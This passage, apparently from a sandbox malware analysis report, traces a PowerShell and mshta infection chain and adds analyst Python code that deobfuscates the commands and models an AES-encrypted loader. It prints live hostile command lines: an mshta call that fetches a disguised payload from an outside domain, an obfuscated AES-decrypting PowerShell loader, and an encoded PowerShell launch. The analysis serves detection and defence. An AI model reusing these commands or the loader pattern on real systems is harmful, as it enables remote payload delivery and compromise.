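    """Peel the ProxyCommand wrapper and evaluate the -replace expression; flag what an analyst cares about."""
    inner = unwrap_proxycommand(cmdline)
    m = REPLACE_RE.search(inner)
    plain = apply_replace(m.group("lit"), m.group("pat"), m.group("rep") or "") if m else inner
    urls = URL_RE.findall(plain)
    low = cmdline.lower()
    return {
        "inner": inner,
        "pattern": m.group("pat") if m else None,
        "deobfuscated": plain,
        "urls": urls,
        "proxycommand_abuse": "ssh.exe" in low and "proxycommand=" in low,
        "mshta_disguised_payload": plain.lstrip().lower().startswith("mshta")
        and any(not urlparse(u).path.lower().endswith(MSHTA_EXPECTED_EXT) for u in urls),
    }


if __name__ == "__main__":
    for label, cmd in (("Target 0", SSH_CMDLINE), ("Target 2", PS_CMDLINE)):
        print(label, deobfuscate(cmd))
```

The recovered string is the Target ID 4 command line (mshta.exe https://cndef1.green-pathways.shop/api/reg/z.mp4), which is the cross-check to apply whenever a padded -replace literal is decoded by hand: the sandbox already executed the expression, so the child process command line is the ground truth.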

                                                                                                  Target ID:4
                                                                                                  Start time:02:48:02
                                                                                                  Start date:17/12/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://cndef1.green-pathways.shop/api/reg/z.mp4"
                                                                                                  Imagebase:0x7ff7be880000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:5
                                                                                                  Start time:02:48:02
                                                                                                  Start date:17/12/2024
                                                                                                  Path:C:\Windows\System32\mshta.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\system32\mshta.exe" https://cndef1.green-pathways.shop/api/reg/z.mp4
                                                                                                  Imagebase:0x7ff637bc0000
                                                                                                  File size:14'848 bytes
                                                                                                  MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  Target ID:6
                                                                                                  Start time:02:48:05
                                                                                                  Start date:17/12/2024
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                  Imagebase:0x7ff7e52b0000
                                                                                                  File size:55'320 bytes
                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:false

                                                                                                  Target ID:7
                                                                                                  Start time:02:48:06
                                                                                                  Start date:17/12/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function EhNo($fVNOW){return -split ($fVNOW -replace '..', '0x$& ')};$mbaO = EhNo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oPMoB=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((EhNo('52786B594D45786F66546252646B4F6D')),[byte[]]::new(16)).TransformFinalBlock($mbaO,0,$mbaO.Length)); & $oPMoB.Substring(0,3) $oPMoB.Substring(186)
                                                                                                  Imagebase:0x7ff7be880000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true
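Added analyst reconstruction of the Target ID 7 loader, not code from the report or from the sample: EhNo turns a hex string into a byte array, the key is the 16 bytes of the recorded hex (AES-128), the IV is [byte[]]::new(16) (sixteen zero bytes), Aes.Create() in .NET defaults to CBC with PKCS7 padding, -join [char[]] maps each byte to one character, and the loader then runs Substring(0,3) as the command with Substring(186) as its argument. The ciphertext itself is not present on this page, so the sample below encrypts a constructed plaintext with the recorded key to exercise the chain; the verb and argument in that plaintext are made up, and the AES primitive comes from the third-party cryptography package (assumed installed; the parsing and split logic runs without it).

```python
"""Model of the AES-wrapped PowerShell stage recorded for Target ID 7 (analyst reconstruction)."""
import re

# Key hex copied from the recorded command line; IV is [byte[]]::new(16) -> sixteen zero bytes.
KEY_HEX = "52786B594D45786F66546252646B4F6D"
ZERO_IV = bytes(16)
VERB_LEN, ARG_OFFSET = 3, 186      # $oPMoB.Substring(0,3) and $oPMoB.Substring(186)

try:
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    HAVE_CRYPTOGRAPHY = True
except ImportError:                # hex parsing and the Substring split still work without it
    HAVE_CRYPTOGRAPHY = False


def ehno(hex_string):
    """Port of EhNo: ($s -replace '..', '0x$& ') followed by unary -split, which PowerShell
    coerces into [byte[]]; str.split() drops the trailing empty token the same way."""
    tokens = re.sub(r"..", lambda m: "0x" + m.group(0) + " ", hex_string).split()
    return bytes(int(t, 16) for t in tokens)


def aes_cbc_decrypt(ciphertext, key, iv=ZERO_IV):
    """Aes.Create().CreateDecryptor(key, iv).TransformFinalBlock(): CBC, PKCS7 unpadding."""
    if not HAVE_CRYPTOGRAPHY:
        raise RuntimeError("cryptography package required for the AES step")
    dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    padded = dec.update(ciphertext) + dec.finalize()
    unpad = padding.PKCS7(128).unpadder()
    return unpad.update(padded) + unpad.finalize()


def aes_cbc_encrypt(plaintext, key, iv=ZERO_IV):
    """Encryption side, used here only to build the constructed sample; the loader has no such step."""
    if not HAVE_CRYPTOGRAPHY:
        raise RuntimeError("cryptography package required for the AES step")
    pad = padding.PKCS7(128).padder()
    padded = pad.update(plaintext) + pad.finalize()
    enc = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
    return enc.update(padded) + enc.finalize()


def split_stage(decrypted_text):
    """Reproduce '& $oPMoB.Substring(0,3) $oPMoB.Substring(186)': the verb, the bytes it skips, the argument.
    Substring(186) throws on a shorter string, so a short decrypt means a wrong key, IV or hex."""
    if len(decrypted_text) < ARG_OFFSET:
        raise ValueError("decrypted stage shorter than the 186-char offset the loader hard-codes")
    return {
        "verb": decrypted_text[:VERB_LEN],
        "skipped": decrypted_text[VERB_LEN:ARG_OFFSET],
        "argument": decrypted_text[ARG_OFFSET:],
    }


def decode_stage(cipher_hex, key_hex=KEY_HEX):
    """Full chain: EhNo(hex) -> AES-128-CBC with zero IV -> -join [char[]] -> Substring split."""
    plaintext = aes_cbc_decrypt(ehno(cipher_hex), ehno(key_hex))
    # -join [char[]] maps one byte to one char, so latin-1 is the faithful decode.
    return split_stage(plaintext.decode("latin-1"))


# Constructed stand-in for the removed ciphertext: a 3-char verb, 183 filler chars, then an argument.
# "run" and the argument text are invented; the real values are not on this page.
SAMPLE_PLAINTEXT = "run" + "X" * (ARG_OFFSET - VERB_LEN) + "constructed-argument --flag"


def build_sample_cipher_hex():
    """Encrypt the constructed plaintext with the recorded key so decode_stage can be run offline."""
    return aes_cbc_encrypt(SAMPLE_PLAINTEXT.encode("latin-1"), ehno(KEY_HEX)).hex().upper()


if __name__ == "__main__":
    print("AES key bytes:", ehno(KEY_HEX))
    if HAVE_CRYPTOGRAPHY:
        print(decode_stage(build_sample_cipher_hex()))
```

To decrypt the real stage, paste the hex argument that EhNo receives in the recorded command line into decode_stage; the verb is whatever the first three characters turn out to be, and the argument starts at character 186, so the 183 characters between them are filler the loader never uses.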

                                                                                                  Target ID:8
                                                                                                  Start time:02:48:06
                                                                                                  Start date:17/12/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:9
                                                                                                  Start time:02:48:08
                                                                                                  Start date:17/12/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -ExecutionPolicy RemoteSigned -Enc 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
                                                                                                  Imagebase:0x7ff7be880000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:10
                                                                                                  Start time:02:48:08
                                                                                                  Start date:17/12/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2089194638.00007FF848CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ff848cc0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                    • Instruction ID: 350e2b64e2b085852a6bc8f0893a62b331c053a54393ba2797a471a786993658
                                                                                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                    • Instruction Fuzzy Hash: 4401677111CB0C4FD744EF0CE455AA5B7E0FB99364F10056EE58AC3661D736E881CB46
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2080450756.00007FF848CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ff848cd0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 293ae8431ce9a3cdd3eeefd5cc1a5689bec792ca2c427d4b90acdb5e17cc8046
                                                                                                    • Instruction ID: 4eaa802fa4823bd1c9398394ef21b1ee28a3cf354c640f9551066e7e57f6d341
                                                                                                    • Opcode Fuzzy Hash: 293ae8431ce9a3cdd3eeefd5cc1a5689bec792ca2c427d4b90acdb5e17cc8046
                                                                                                    • Instruction Fuzzy Hash: 9901677115CB0C4FD744EF0CE455AA5B7E0FB99364F10056DE58AC3661DB36E882CB45
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000003.2189699666.000002995ADE2000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002995ADE2000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_3_2995ade2000_mshta.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c5aa5cded8a88d7e9e5aa9da7ca5673701b4177522f8a5f3dc2dfa414b2e9ccb
                                                                                                    • Instruction ID: 4f2ff2ecd620392fc10f058b1449fc41ffa241ab66062e5ceada3572835ef96e
                                                                                                    • Opcode Fuzzy Hash: c5aa5cded8a88d7e9e5aa9da7ca5673701b4177522f8a5f3dc2dfa414b2e9ccb
                                                                                                    • Instruction Fuzzy Hash: AB11651151EBC44FEB5B667C483D36A3BE1DB56210F9B44DFD586CB1E2E8044CC98365
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000003.2189751464.000002995A6F0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002995A6F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_3_2995a6f0000_mshta.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                    • Instruction ID: fbf8e0f4a1bc386a485a27ea2c10b6c927c6447e579d027b24543318931e6e16
                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                    • Instruction Fuzzy Hash: 689004044D740755D41551D50C4D35D504173CC570FD744C4CC17D014CF44D03DF1157
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2185867115.00007FF8477F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff8477f0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7f1560584926b533ee19add686ddd5279c370eeeb6afa3644adc5f76843016b4
                                                                                                    • Instruction ID: c3171b4a70b43ce2bce6cc518e9e310bb9fbdd23b455d7371b86a72741df5ffa
                                                                                                    • Opcode Fuzzy Hash: 7f1560584926b533ee19add686ddd5279c370eeeb6afa3644adc5f76843016b4
                                                                                                    • Instruction Fuzzy Hash: E1712562A0EBC98FEB56AA3C59A55783FF1EF6725074901EBC448CB1E3D918EC06C341
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2185345202.00007FF847720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847720000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff847720000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                    • Instruction ID: fb76471e6f5f478bc03e54cb9187a7a2f2ace209373a1a613f15fb66885e60e6
                                                                                                    • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                    • Instruction Fuzzy Hash: FE01677111CB0C8FD744EF0CE451AA5B7E0FB95364F50056DE58AC3665D636E882CB46
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2185867115.00007FF8477F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff8477f0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a216432190955116dcf0ff82557d6ed2aa17512a3a905e6a93f6aa3158f40e8e
                                                                                                    • Instruction ID: 6248eaf8e5cee67790f75344ddbbd4dd3ee6cae91d19cfd173d5244d80cd343c
                                                                                                    • Opcode Fuzzy Hash: a216432190955116dcf0ff82557d6ed2aa17512a3a905e6a93f6aa3158f40e8e
                                                                                                    • Instruction Fuzzy Hash: 78E0D833E0D82E5EEBA5B55C25181FC62D1FF5467178801B7D91DD3281EC049C118795
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2445494218.00007FF8477C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ff8477c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: mr[H
                                                                                                    • API String ID: 0-2654273985
                                                                                                    • Opcode ID: 0abf32d5e7b88f55e5dc298484d89ebc44162b4c5f8bab0998cda8fcebdbdbb8
                                                                                                    • Instruction ID: 64431a9087574b1cf689f44c8866761bba3640338b46c8c1a394f55db44a2dda
                                                                                                    • Opcode Fuzzy Hash: 0abf32d5e7b88f55e5dc298484d89ebc44162b4c5f8bab0998cda8fcebdbdbb8
                                                                                                    • Instruction Fuzzy Hash: 0621F362D0EACA8FF38AAA7C58551783BE1FF1A2D074900FBD548CB1E3DD085C4A8325
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2444240038.00007FF8476F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ff8476f0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 84bf19f41643cd442c3a85869980f507c5e61be6ce759dcc183f99dbf573ec4f
                                                                                                    • Instruction ID: ae73a4ddb5c08e29b1213c7d35a729084bf896051fbf0ce067dad65f1eae4eaf
                                                                                                    • Opcode Fuzzy Hash: 84bf19f41643cd442c3a85869980f507c5e61be6ce759dcc183f99dbf573ec4f
                                                                                                    • Instruction Fuzzy Hash: 1812D430A1CA898FDB84EF1CC485AED7BE1FFA9354F54056ED449C7296DA34E842CB81
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2445494218.00007FF8477C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ff8477c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5b8233e20c4ee13e95c6eede755041551cab3b2946771855ea7de7ab666e101a
                                                                                                    • Instruction ID: 4610608388abbe382008d08e3e73f66fceefbdb7932fb275e1d4bef6dd7c6830
                                                                                                    • Opcode Fuzzy Hash: 5b8233e20c4ee13e95c6eede755041551cab3b2946771855ea7de7ab666e101a
                                                                                                    • Instruction Fuzzy Hash: 89122561E0EB8A9FE799AA2858511BC7BE1FF5A790F4801FAD40CC71D3DD18AC468346
Memory Dump Source
• Source File: 00000009.00000002.2444240038.00007FF8476F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff8476f0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 14519e921102746a586ca7a2ccba9c94f822801dd3536a8d90bbab63678df340
• Instruction ID: d350aeba02028b1d30d839febae015457386e7d6b3167e9f536edc403dd3af8e
• Opcode Fuzzy Hash: 14519e921102746a586ca7a2ccba9c94f822801dd3536a8d90bbab63678df340
• Instruction Fuzzy Hash: 1E01A73010CB0C8FDB44EF0CE051AA5B7E0FB85364F10056DE58AC3665D632E882CB45
Strings
Memory Dump Source
• Source File: 00000009.00000002.2444240038.00007FF8476F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff8476f0000_powershell.jbxd
Similarity
• API ID:
• String ID: N_^$N_^$N_^$N_^
• API String ID: 0-3900292545
• Opcode ID: a9d3b5e4b7e72c2b54f0f9e1f50636c21494e7c9ca66f39ecf47d4e794e0836e
• Instruction ID: a53484b80b7f5b842ccaca7107dc296a05b150e421f48490f118e5e46df3caa3
• Opcode Fuzzy Hash: a9d3b5e4b7e72c2b54f0f9e1f50636c21494e7c9ca66f39ecf47d4e794e0836e
• Instruction Fuzzy Hash: 7C21D4B3F0D5838FD3479B2D9CA20A87B91FF6665831D01F9C19D8B193ED24A4074246